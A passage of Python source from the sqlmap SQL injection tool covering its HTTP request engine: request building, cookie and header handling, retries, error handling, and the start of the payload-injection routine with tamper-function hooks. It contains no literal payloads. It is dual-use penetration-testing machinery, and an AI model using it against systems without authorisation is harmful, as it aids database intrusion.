randomStr(int(randomInt()), alphabet=[_unichr(_) for _ in xrange(256)]), None, None if not conf.murphyRate else randomInt(3)\n\n            threadData.lastPage = page\n            threadData.lastCode = code\n\n            return page, headers, code\n\n        if conf.liveCookies:\n            with kb.locks.liveCookies:\n                if not checkFile(conf.liveCookies, raiseOnError=False) or os.path.getsize(conf.liveCookies) == 0:\n                    warnMsg = \"[%s] [WARNING] live cookies file '%s' is empty or non-existent. Waiting for timeout (%d seconds)\" % (time.strftime(\"%X\"), conf.liveCookies, LIVE_COOKIES_TIMEOUT)\n                    dataToStdout(warnMsg)\n\n                    valid = False\n                    for _ in xrange(LIVE_COOKIES_TIMEOUT):\n                        if checkFile(conf.liveCookies, raiseOnError=False) and os.path.getsize(conf.liveCookies) > 0:\n                            valid = True\n                            break\n                        else:\n                            dataToStdout('.')\n                            time.sleep(1)\n\n                    dataToStdout(\"\\n\")\n\n                    if not valid:\n                        errMsg = \"problem occurred while loading cookies from file '%s'\" % conf.liveCookies\n                        raise SqlmapValueException(errMsg)\n\n                cookie = openFile(conf.liveCookies).read().strip()\n                cookie = re.sub(r\"(?i)\\ACookie:\\s*\", \"\", cookie)\n\n        if multipart:\n            post = multipart\n        else:\n            if not post:\n                chunked = False\n\n            elif chunked:\n                post = _urllib.parse.unquote(post)\n                post = chunkSplitPostData(post)\n\n        webSocket = url.lower().startswith(\"ws\")\n\n        if not _urllib.parse.urlsplit(url).netloc:\n            url = _urllib.parse.urljoin(conf.url, url)\n\n        # flag to know if we are dealing with the same target host\n        target = checkSameHost(url, conf.url)\n\n        if not retrying:\n            # Reset the number of connection retries\n            threadData.retriesCount = 0\n\n        # fix for known issue when urllib2 just skips the other part of provided\n        # url splitted with space char while urlencoding it in the later phase\n        url = url.replace(\" \", \"%20\")\n\n        if \"://\" not in url:\n            url = \"http://%s\" % url\n\n        conn = None\n        page = None\n        code = None\n        status = None\n\n        _ = _urllib.parse.urlsplit(url)\n        requestMsg = u\"HTTP request [#%d]:\\r\\n%s \" % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))\n        requestMsg += getUnicode((\"%s%s\" % (_.path or \"/\", (\"?%s\" % _.query) if _.query else \"\")) if not any((refreshing, crawling, checking)) else url)\n        responseMsg = u\"HTTP response \"\n        requestHeaders = u\"\"\n        responseHeaders = None\n        logHeaders = u\"\"\n        skipLogTraffic = False\n\n        raise404 = raise404 and not kb.ignoreNotFound\n\n        # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't\n        # support those by default\n        url = asciifyUrl(url)\n\n        try:\n            socket.setdefaulttimeout(timeout)\n\n            if direct_:\n                if '?' in url:\n                    url, params = url.split('?', 1)\n                    params = urlencode(params)\n                    url = \"%s?%s\" % (url, params)\n\n            elif any((refreshing, crawling, checking)):\n                pass\n\n            elif target:\n                if conf.forceSSL:\n                    url = re.sub(r\"(?i)\\A(http|ws):\", r\"\\g<1>s:\", url)\n                    url = re.sub(r\"(?i):80/\", \":443/\", url)\n\n                if PLACE.GET in conf.parameters and not get:\n                    get = conf.parameters[PLACE.GET]\n\n                    if not conf.skipUrlEncode:\n                        get = urlencode(get, limit=True)\n\n                if get:\n                    if '?' in url:\n                        url = \"%s%s%s\" % (url, DEFAULT_GET_POST_DELIMITER, get)\n                        requestMsg += \"%s%s\" % (DEFAULT_GET_POST_DELIMITER, get)\n                    else:\n                        url = \"%s?%s\" % (url, get)\n                        requestMsg += \"?%s\" % get\n\n                if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET:\n                    post = conf.parameters[PLACE.POST]\n\n            elif get:\n                url = \"%s?%s\" % (url, get)\n                requestMsg += \"?%s\" % get\n\n            requestMsg += \" %s\" % _http_client.HTTPConnection._http_vsn_str\n\n            # Prepare HTTP headers\n            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}, base=None if target else {})\n\n            if HTTP_HEADER.COOKIE in headers:\n                cookie = headers[HTTP_HEADER.COOKIE]\n\n            if kb.authHeader:\n                headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader\n\n            if kb.proxyAuthHeader:\n                headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader\n\n            if not conf.requestFile or not target:\n                if not getHeader(headers, HTTP_HEADER.HOST):\n                    headers[HTTP_HEADER.HOST] = getHostHeader(url)\n\n                if not getHeader(headers, HTTP_HEADER.ACCEPT):\n                    headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE\n\n                if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):\n                    headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else \"identity\"\n\n            elif conf.requestFile and getHeader(headers, HTTP_HEADER.USER_AGENT) == DEFAULT_USER_AGENT:\n                for header in headers:\n                    if header.upper() == HTTP_HEADER.USER_AGENT.upper():\n                        del headers[header]\n                        break\n\n            if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):\n                headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE if unArrayizeValue(conf.base64Parameter) != HTTPMETHOD.POST else PLAIN_TEXT_CONTENT_TYPE)\n\n            if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:\n                warnMsg = \"missing 'boundary parameter' in '%s' header. \" % HTTP_HEADER.CONTENT_TYPE\n                warnMsg += \"Will try to reconstruct\"\n                singleTimeWarnMessage(warnMsg)\n\n                boundary = findMultipartPostBoundary(conf.data)\n                if boundary:\n                    headers[HTTP_HEADER.CONTENT_TYPE] = \"%s; boundary=%s\" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary)\n\n            if conf.keepAlive:\n                headers[HTTP_HEADER.CONNECTION] = \"keep-alive\"\n\n            if chunked:\n                headers[HTTP_HEADER.TRANSFER_ENCODING] = \"chunked\"\n\n            if auxHeaders:\n                headers = forgeHeaders(auxHeaders, headers)\n\n            if kb.headersFile:\n                content = openFile(kb.headersFile, \"rb\").read()\n                for line in content.split(\"\\n\"):\n                    line = getText(line.strip())\n                    if ':' in line:\n                        header, value = line.split(':', 1)\n                        headers[header] = value\n\n            if conf.localhost:\n                headers[HTTP_HEADER.HOST] = \"localhost\"\n\n            for key, value in list(headers.items()):\n                if key.upper() == HTTP_HEADER.ACCEPT_ENCODING.upper():\n                    value = re.sub(r\"(?i)(,)br(,)?\", lambda match: ',' if match.group(1) and match.group(2) else \"\", value) or \"identity\"\n\n                del headers[key]\n                if isinstance(value, six.string_types):\n                    for char in (r\"\\r\", r\"\\n\"):\n                        value = re.sub(r\"(%s)([^ \\t])\" % char, r\"\\g<1>\\t\\g<2>\", value)\n                    headers[getBytes(key) if six.PY2 else key] = getBytes(value.strip(\"\\r\\n\"))  # Note: Python3 has_header() expects non-bytes value\n\n            if six.PY2:\n                url = getBytes(url)  # Note: Python3 requires text while Python2 has problems when mixing text with binary POST\n\n            if webSocket:\n                ws = websocket.WebSocket()\n                ws.settimeout(WEBSOCKET_INITIAL_TIMEOUT if kb.webSocketRecvCount is None else timeout)\n                ws.connect(url, header=(\"%s: %s\" % _ for _ in headers.items() if _[0] not in (\"Host\",)), cookie=cookie)  # WebSocket will add Host field of headers automatically\n                ws.send(urldecode(post or \"\"))\n\n                _page = []\n\n                if kb.webSocketRecvCount is None:\n                    while True:\n                        try:\n                            _page.append(ws.recv())\n                        except websocket.WebSocketTimeoutException:\n                            kb.webSocketRecvCount = len(_page)\n                            break\n                else:\n                    for i in xrange(max(1, kb.webSocketRecvCount)):\n                        _page.append(ws.recv())\n\n                page = \"\\n\".join(_page)\n\n                ws.close()\n                code = ws.status\n                status = _http_client.responses[code]\n\n                class _(dict):\n                    pass\n\n                responseHeaders = _(ws.getheaders())\n                responseHeaders.headers = [\"%s: %s\\r\\n\" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]\n\n                requestHeaders += \"\\r\\n\".join([\"%s: %s\" % (getUnicode(key.capitalize() if hasattr(key, \"capitalize\") else key), getUnicode(value)) for (key, value) in responseHeaders.items()])\n                requestMsg += \"\\r\\n%s\" % requestHeaders\n\n                if post is not None:\n                    requestMsg += \"\\r\\n\\r\\n%s\" % getUnicode(post)\n\n                requestMsg += \"\\r\\n\"\n\n                threadData.lastRequestMsg = requestMsg\n\n                logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)\n            else:\n                post = getBytes(post)\n\n                if unArrayizeValue(conf.base64Parameter) == HTTPMETHOD.POST:\n                    if kb.place != HTTPMETHOD.POST:\n                        conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)\n                    else:\n                        post = urldecode(post, convall=True)\n                        post = encodeBase64(post)\n\n                if target and cmdLineOptions.method or method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):\n                    req = MethodRequest(url, post, headers)\n                    req.set_method(cmdLineOptions.method or method)\n                elif url is not None:\n                    req = _urllib.request.Request(url, post, headers)\n                else:\n                    return None, None, None\n\n                for function in kb.preprocessFunctions:\n                    try:\n                        function(req)\n                    except Exception as ex:\n                        errMsg = \"error occurred while running preprocess \"\n                        errMsg += \"function '%s' ('%s')\" % (function.__name__, getSafeExString(ex))\n                        raise SqlmapGenericException(errMsg)\n                    else:\n                        post, headers = req.data, req.headers\n\n                requestHeaders += \"\\r\\n\".join([\"%s: %s\" % (getUnicode(key.capitalize() if hasattr(key, \"capitalize\") else key), getUnicode(value)) for (key, value) in req.header_items()])\n\n                if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:\n                    conf.cj._policy._now = conf.cj._now = int(time.time())\n                    cookies = conf.cj._cookies_for_request(req)\n                    requestHeaders += \"\\r\\n%s\" % (\"Cookie: %s\" % \";\".join(\"%s=%s\" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))\n\n                if post is not None:\n                    if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH) and not chunked:\n                        requestHeaders += \"\\r\\n%s: %d\" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))\n\n                if not getRequestHeader(req, HTTP_HEADER.CONNECTION):\n                    requestHeaders += \"\\r\\n%s: %s\" % (HTTP_HEADER.CONNECTION, \"close\" if not conf.keepAlive else \"keep-alive\")\n\n                requestMsg += \"\\r\\n%s\" % requestHeaders\n\n                if post is not None:\n                    requestMsg += \"\\r\\n\\r\\n%s\" % getUnicode(post)\n\n                if not chunked:\n                    requestMsg += \"\\r\\n\"\n\n                if not multipart:\n                    threadData.lastRequestMsg = requestMsg\n\n                    logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)\n\n                if conf.cj:\n                    for cookie in conf.cj:\n                        if cookie.value is None:\n                            cookie.value = \"\"\n                        else:\n                            for char in (r\"\\r\", r\"\\n\"):\n                                cookie.value = re.sub(r\"(%s)([^ \\t])\" % char, r\"\\g<1>\\t\\g<2>\", cookie.value)\n\n                conn = _urllib.request.urlopen(req)\n\n                if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or \"\").lower() == AUTH_TYPE.BASIC.lower():\n                    kb.authHeader = getUnicode(getRequestHeader(req, HTTP_HEADER.AUTHORIZATION))\n\n                if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):\n                    kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)\n\n                # Return response object\n                if response:\n                    return conn, None, None\n\n                # Get HTTP response\n                if hasattr(conn, \"redurl\"):\n                    page = (threadData.lastRedirectMsg[1] if kb.choices.redirect == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None\n                    skipLogTraffic = kb.choices.redirect == REDIRECTION.NO\n                    code = conn.redcode if not finalCode else code\n                else:\n                    page = Connect._connReadProxy(conn) if not skipRead else None\n\n                if conn:\n                    code = (code or conn.code) if conn.code == kb.originalCode else conn.code  # do not override redirection code (for comparison purposes)\n                    responseHeaders = conn.info()\n                    responseHeaders[URI_HTTP_HEADER] = conn.geturl() if hasattr(conn, \"geturl\") else url\n\n                    if hasattr(conn, \"redurl\"):\n                        responseHeaders[HTTP_HEADER.LOCATION] = conn.redurl\n\n                    responseHeaders = patchHeaders(responseHeaders)\n                    kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader)\n                else:\n                    code = None\n                    responseHeaders = {}\n\n                page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE), percentDecode=not crawling)\n                status = getUnicode(conn.msg) if conn and getattr(conn, \"msg\", None) else None\n\n            kb.connErrorCounter = 0\n\n            if not refreshing:\n                refresh = responseHeaders.get(HTTP_HEADER.REFRESH, \"\").split(\"url=\")[-1].strip()\n\n                if extractRegexResult(META_REFRESH_REGEX, page):\n                    refresh = extractRegexResult(META_REFRESH_REGEX, page)\n\n                    debugMsg = \"got HTML meta refresh header\"\n                    logger.debug(debugMsg)\n\n                if not refresh:\n                    refresh = extractRegexResult(JAVASCRIPT_HREF_REGEX, page)\n\n                    if refresh:\n                        debugMsg = \"got Javascript redirect logic\"\n                        logger.debug(debugMsg)\n\n                if refresh:\n                    if kb.alwaysRefresh is None:\n                        msg = \"got a refresh intent \"\n                        msg += \"(redirect like response common to login pages) to '%s'. \" % refresh\n                        msg += \"Do you want to apply it from now on? [Y/n]\"\n\n                        kb.alwaysRefresh = readInput(msg, default='Y', boolean=True)\n\n                    if kb.alwaysRefresh:\n                        if re.search(r\"\\Ahttps?://\", refresh, re.I):\n                            url = refresh\n                        else:\n                            url = _urllib.parse.urljoin(url, refresh)\n\n                        threadData.lastRedirectMsg = (threadData.lastRequestUID, page)\n                        kwargs[\"refreshing\"] = True\n                        kwargs[\"url\"] = url\n                        kwargs[\"get\"] = None\n                        kwargs[\"post\"] = None\n\n                        try:\n                            return Connect._getPageProxy(**kwargs)\n                        except SqlmapSyntaxException:\n                            pass\n\n            # Explicit closing of connection object\n            if conn and not conf.keepAlive:\n                try:\n                    if hasattr(conn.fp, '_sock'):\n                        conn.fp._sock.close()\n                    conn.close()\n                except Exception as ex:\n                    warnMsg = \"problem occurred during connection closing ('%s')\" % getSafeExString(ex)\n                    logger.warning(warnMsg)\n\n        except SqlmapConnectionException as ex:\n            if conf.proxyList and not kb.threadException:\n                warnMsg = \"unable to connect to the target URL ('%s')\" % getSafeExString(ex)\n                logger.critical(warnMsg)\n                threadData.retriesCount = conf.retries\n                return Connect._retryProxy(**kwargs)\n            else:\n                raise\n\n        except _urllib.error.HTTPError as ex:\n            page = None\n            responseHeaders = None\n\n            if checking:\n                return None, None, None\n\n            try:\n                page = ex.read() if not skipRead else None\n                responseHeaders = ex.info()\n                responseHeaders[URI_HTTP_HEADER] = ex.geturl()\n                responseHeaders = patchHeaders(responseHeaders)\n                page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE), percentDecode=not crawling)\n            except socket.timeout:\n                warnMsg = \"connection timed out while trying \"\n                warnMsg += \"to get error page information (%d)\" % ex.code\n                logger.warning(warnMsg)\n                return None, None, None\n            except KeyboardInterrupt:\n                raise\n            except:\n                pass\n            finally:\n                page = getUnicode(page)\n\n            code = ex.code\n            status = getUnicode(getattr(ex, \"reason\", None) or getSafeExString(ex).split(\": \", 1)[-1])\n\n            kb.originalCode = kb.originalCode or code\n            threadData.lastHTTPError = (threadData.lastRequestUID, code, status)\n            kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1\n\n            responseMsg += \"[#%d] (%s %s):\\r\\n\" % (threadData.lastRequestUID, code, status)\n\n            if responseHeaders:\n                logHeaders = \"\".join(getUnicode(responseHeaders.headers)).strip()\n\n            logHTTPTraffic(requestMsg, \"%s%s\\r\\n\\r\\n%s\" % (responseMsg, logHeaders, (page or \"\")[:MAX_CONNECTION_READ_SIZE]), start, time.time())\n\n            skipLogTraffic = True\n\n            if conf.verbose <= 5:\n                responseMsg += getUnicode(logHeaders)\n            elif conf.verbose > 5:\n                responseMsg += \"%s\\r\\n\\r\\n%s\" % (logHeaders, (page or \"\")[:MAX_CONNECTION_READ_SIZE])\n\n            if not multipart:\n                logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)\n\n            if ex.code not in (conf.ignoreCode or []):\n                if ex.code == _http_client.UNAUTHORIZED:\n                    errMsg = \"not authorized, try to provide right HTTP \"\n                    errMsg += \"authentication type and valid credentials (%d). \" % code\n                    errMsg += \"If this is intended, try to rerun by providing \"\n                    errMsg += \"a valid value for option '--ignore-code'\"\n                    raise SqlmapConnectionException(errMsg)\n                elif chunked and ex.code in (_http_client.METHOD_NOT_ALLOWED, _http_client.LENGTH_REQUIRED):\n                    warnMsg = \"turning off HTTP chunked transfer encoding \"\n                    warnMsg += \"as it seems that the target site doesn't support it (%d)\" % code\n                    singleTimeWarnMessage(warnMsg)\n                    conf.chunked = kwargs[\"chunked\"] = False\n                    return Connect.getPage(**kwargs)\n                elif ex.code == _http_client.REQUEST_URI_TOO_LONG:\n                    warnMsg = \"request URI is marked as too long by the target. \"\n                    warnMsg += \"you are advised to try a switch '--no-cast' and/or '--no-escape'\"\n                    singleTimeWarnMessage(warnMsg)\n                elif ex.code == _http_client.NOT_FOUND:\n                    if raise404:\n                        errMsg = \"page not found (%d)\" % code\n                        raise SqlmapConnectionException(errMsg)\n                    else:\n                        debugMsg = \"page not found (%d)\" % code\n                        singleTimeLogMessage(debugMsg, logging.DEBUG)\n                elif ex.code == _http_client.GATEWAY_TIMEOUT:\n                    if ignoreTimeout:\n                        return None if not conf.ignoreTimeouts else \"\", None, None\n                    else:\n                        warnMsg = \"unable to connect to the target URL (%d - %s)\" % (ex.code, _http_client.responses[ex.code])\n                        if threadData.retriesCount < conf.retries and not kb.threadException:\n                            warnMsg += \". sqlmap is going to retry the request\"\n                            logger.critical(warnMsg)\n                            return Connect._retryProxy(**kwargs)\n                        elif kb.testMode:\n                            logger.critical(warnMsg)\n                            return None, None, None\n                        else:\n                            raise SqlmapConnectionException(warnMsg)\n                else:\n                    debugMsg = \"got HTTP error code: %d ('%s')\" % (code, status)\n                    logger.debug(debugMsg)\n\n        except (_urllib.error.URLError, socket.error, socket.timeout, _http_client.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError, OverflowError, AttributeError, OSError):\n            tbMsg = traceback.format_exc()\n\n            if conf.debug:\n                dataToStdout(tbMsg)\n\n            if checking:\n                return None, None, None\n            elif \"AttributeError:\" in tbMsg:\n                if \"WSAECONNREFUSED\" in tbMsg:\n                    return None, None, None\n                else:\n                    raise\n            elif \"no host given\" in tbMsg:\n                warnMsg = \"invalid URL address used (%s)\" % repr(url)\n                raise SqlmapSyntaxException(warnMsg)\n            elif any(_ in tbMsg for _ in (\"forcibly closed\", \"Connection is already closed\", \"ConnectionAbortedError\")):\n                warnMsg = \"connection was forcibly closed by the target URL\"\n            elif \"timed out\" in tbMsg:\n                if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):\n                    singleTimeWarnMessage(\"there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests\")\n                    kb.droppingRequests = True\n                warnMsg = \"connection timed out to the target URL\"\n            elif \"Connection reset\" in tbMsg:\n                if not conf.disablePrecon:\n                    singleTimeWarnMessage(\"turning off pre-connect mechanism because of connection reset(s)\")\n                    conf.disablePrecon = True\n\n                if kb.testMode:\n                    singleTimeWarnMessage(\"there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests\")\n                    kb.droppingRequests = True\n                warnMsg = \"connection reset to the target URL\"\n            elif \"URLError\" in tbMsg or \"error\" in tbMsg:\n                warnMsg = \"unable to connect to the target URL\"\n                match = re.search(r\"Errno \\d+\\] ([^>\\n]+)\", tbMsg)\n                if match:\n                    warnMsg += \" ('%s')\" % match.group(1).strip()\n            elif \"NTLM\" in tbMsg:\n                warnMsg = \"there has been a problem with NTLM authentication\"\n            elif \"Invalid header name\" in tbMsg:  # (e.g. PostgreSQL ::Text payload)\n                return None, None, None\n            elif \"BadStatusLine\" in tbMsg:\n                warnMsg = \"connection dropped or unknown HTTP \"\n                warnMsg += \"status code received\"\n                if not conf.agent and not conf.randomAgent:\n                    warnMsg += \". Try to force the HTTP User-Agent \"\n                    warnMsg += \"header with option '--user-agent' or switch '--random-agent'\"\n            elif \"IncompleteRead\" in tbMsg:\n                warnMsg = \"there was an incomplete read error while retrieving data \"\n                warnMsg += \"from the target URL\"\n            elif \"Handshake status\" in tbMsg:\n                status = re.search(r\"Handshake status ([\\d]{3})\", tbMsg)\n                errMsg = \"websocket handshake status %s\" % status.group(1) if status else \"unknown\"\n                raise SqlmapConnectionException(errMsg)\n            elif \"SqlmapCompressionException\" in tbMsg:\n                warnMsg = \"problems with response (de)compression\"\n                retrying = True\n            else:\n                warnMsg = \"unable to connect to the target URL\"\n\n            if \"BadStatusLine\" not in tbMsg and any((conf.proxy, conf.tor)):\n                warnMsg += \" or proxy\"\n\n            if silent:\n                return None, None, None\n\n            with kb.locks.connError:\n                kb.connErrorCounter += 1\n\n                if kb.connErrorCounter >= MAX_CONSECUTIVE_CONNECTION_ERRORS and kb.choices.connError is None:\n                    message = \"there seems to be a continuous problem with connection to the target. \"\n                    message += \"Are you sure that you want to continue? [y/N] \"\n\n                    kb.choices.connError = readInput(message, default='N', boolean=True)\n\n                if kb.choices.connError is False:\n                    raise SqlmapSkipTargetException\n\n            if \"forcibly closed\" in tbMsg:\n                logger.critical(warnMsg)\n                return None, None, None\n            elif ignoreTimeout and any(_ in tbMsg for _ in (\"timed out\", \"IncompleteRead\", \"Interrupted system call\")):\n                return None if not conf.ignoreTimeouts else \"\", None, None\n            elif threadData.retriesCount < conf.retries and not kb.threadException:\n                warnMsg += \". sqlmap is going to retry the request\"\n                if not retrying:\n                    warnMsg += \"(s)\"\n                    logger.critical(warnMsg)\n                else:\n                    logger.debug(warnMsg)\n                return Connect._retryProxy(**kwargs)\n            elif kb.testMode or kb.multiThreadMode:\n                logger.critical(warnMsg)\n                return None, None, None\n            else:\n                raise SqlmapConnectionException(warnMsg)\n\n        finally:\n            if isinstance(page, six.binary_type):\n                if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]):\n                    page = six.text_type(page, errors=\"ignore\")\n                else:\n                    page = getUnicode(page)\n\n            for function in kb.postprocessFunctions:\n                try:\n                    page, responseHeaders, code = function(page, responseHeaders, code)\n                except Exception as ex:\n                    errMsg = \"error occurred while running postprocess \"\n                    errMsg += \"function '%s' ('%s')\" % (function.__name__, getSafeExString(ex))\n                    raise SqlmapGenericException(errMsg)\n\n            threadData.lastPage = page\n            threadData.lastCode = code\n\n            socket.setdefaulttimeout(conf.timeout)\n\n        # Dirty patch for Python3.11.0a7 (e.g. https://github.com/sqlmapproject/sqlmap/issues/5091)\n        if not sys.version.startswith(\"3.11.\"):\n            if conf.retryOn and re.search(conf.retryOn, page, re.I):\n                if threadData.retriesCount < conf.retries:\n                    warnMsg = \"forced retry of the request because of undesired page content\"\n                    logger.warning(warnMsg)\n                    return Connect._retryProxy(**kwargs)\n\n        processResponse(page, responseHeaders, code, status)\n\n        if not skipLogTraffic:\n            if conn and getattr(conn, \"redurl\", None):\n                _ = _urllib.parse.urlsplit(conn.redurl)\n                _ = (\"%s%s\" % (_.path or \"/\", (\"?%s\" % _.query) if _.query else \"\"))\n                requestMsg = re.sub(r\"(\\n[A-Z]+ ).+?( HTTP/\\d)\", r\"\\g<1>%s\\g<2>\" % getUnicode(_).replace(\"\\\\\", \"\\\\\\\\\"), requestMsg, 1)\n\n                if kb.resendPostOnRedirect is False:\n                    requestMsg = re.sub(r\"(\\[#\\d+\\]:\\n)POST \", r\"\\g<1>GET \", requestMsg)\n                    requestMsg = re.sub(r\"(?i)Content-length: \\d+\\n\", \"\", requestMsg)\n                    requestMsg = re.sub(r\"(?s)\\n\\n.+\", \"\\n\", requestMsg)\n\n                responseMsg += \"[#%d] (%s %s):\\r\\n\" % (threadData.lastRequestUID, conn.code, status)\n            elif \"\\n\" not in responseMsg:\n                responseMsg += \"[#%d] (%s %s):\\r\\n\" % (threadData.lastRequestUID, code, status)\n\n            if responseHeaders:\n                logHeaders = \"\".join(getUnicode(responseHeaders.headers)).strip()\n\n            logHTTPTraffic(requestMsg, \"%s%s\\r\\n\\r\\n%s\" % (responseMsg, logHeaders, (page or \"\")[:MAX_CONNECTION_READ_SIZE]), start, time.time())\n\n            if conf.verbose <= 5:\n                responseMsg += getUnicode(logHeaders)\n            elif conf.verbose > 5:\n                responseMsg += \"%s\\r\\n\\r\\n%s\" % (logHeaders, (page or \"\")[:MAX_CONNECTION_READ_SIZE])\n\n            if not multipart:\n                logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)\n\n        return page, responseHeaders, code\n\n    @staticmethod\n    @stackedmethod\n    def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, disableTampering=False, ignoreSecondOrder=False):\n        \"\"\"\n        This method calls a function to get the target URL page content\n        and returns its page ratio (0 <= ratio <= 1) or a boolean value\n        representing False/True match in case of !getRatioValue\n        \"\"\"\n\n        if conf.direct:\n            return direct(value, content)\n\n        get = None\n        post = None\n        cookie = None\n        ua = None\n        referer = None\n        host = None\n        page = None\n        pageLength = None\n        uri = None\n        code = None\n\n        if not place:\n            place = kb.injection.place or PLACE.GET\n\n        kb.place = place\n\n        if not auxHeaders:\n            auxHeaders = {}\n\n        raise404 = place != PLACE.URI if raise404 is None else raise404\n        method = method or conf.method\n\n        postUrlEncode = kb.postUrlEncode\n\n        value = agent.adjustLateValues(value)\n        payload = agent.extractPayload(value)\n        threadData = getCurrentThreadData()\n\n        if conf.httpHeaders:\n            headers = OrderedDict(conf.httpHeaders)\n            contentType = max(headers[_] or \"\" if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else \"\" for _ in headers) or None\n\n            if (kb.postHint or conf.skipUrlEncode) and postUrlEncode:\n                postUrlEncode = False\n                if not (conf.skipUrlEncode and contentType):    # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5092\n                    conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]\n                    contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)\n                    conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))\n\n        if payload:\n            delimiter = conf.paramDel or (DEFAULT_GET_POST_DELIMITER if place != PLACE.COOKIE else DEFAULT_COOKIE_DELIMITER)\n\n            if not disableTampering and kb.tamperFunctions:\n                for function in kb.tamperFunctions:\n                    hints = {}\n\n                    try:\n                        payload = function(payload=payload, headers=auxHeaders, delimiter=delimiter, hints=hints)\n                    except Exception as ex:\n                        errMsg = \"error occurred while running tamper \"\n                        errMsg += \"function '%s' ('%s')\" % (function.__name__, getSafeExString(ex))\n                        raise SqlmapGenericException(errMsg)\n\n                    if not isinstance(payload, six.string_types):\n                        errMsg = \"tamper function '%s' returns \" % function.__name__\n                        errMsg += \"invalid payload type ('%s')\" % type(payload)\n                        raise SqlmapValueException(errMsg)\n\n                value = agent.replacePayload(value, payload)\n\n                if hints:\n                    if HINT.APPEND in hints:\n                        value = \"%s%s%s\" % (value, delimiter, hints[HINT.APPEND])\n\n                    if HINT.PREPEND in hints:\n                        if place == PLACE.URI:\n                            match = re.search(r\"\\w+\\s*=\\s*%s\" % PAYLOAD_DELIMITER, value) or re.search(r\"[^?%s/]=\\s*%s\" % (re.escape(delimiter), PAYLOAD_DELIMITER), value)\n                            if match:\n                                value = value.replace(match.group(0), \"%s%s%s\" % (hints[HINT.PREPEND], delimiter, match.group(0)))\n                        else:\n                            value = \"%s%s%s\" % (hints[HINT.PREPEND], delimiter, value)\n\n            logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\\\'))\n\n            if place == PLACE.CUSTOM_POST and kb.postHint:\n                if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):\n                    # payloads in SOAP/XML should have chars > and < replaced\n                    # with their HTML encoded counterparts\n                    payload = payload.replace('&', \"&amp;\").replace('>', \"&gt;\").replace('<', \"&lt;\").replace('\"', \"&quot;\").replace(\"'\", \"&apos;\")  # Reference: https://stackoverflow.com/a/1091953\n                elif kb.postHint == POST_HINT.JSON:\n                    payload = escapeJsonValue(payload)\n                elif kb.postHint == POST_HINT.JSON_LIKE:\n                    payload = payload.replace(\"'\", REPLACEMENT_MARKER).replace('\"', \"'\").replace(REPLACEMENT_MARKER, '\"')\n                    payload = escapeJsonValue(payload)\n                    payload = payload.replace(\"'\", REPLACEMENT_MARKER).replace('\"', \"'\").replace(REPLACEMENT_MARKER, '\"')\n                value = agent.replacePayload(value, payload)\n            else:\n                # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded\n                if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper()) and not 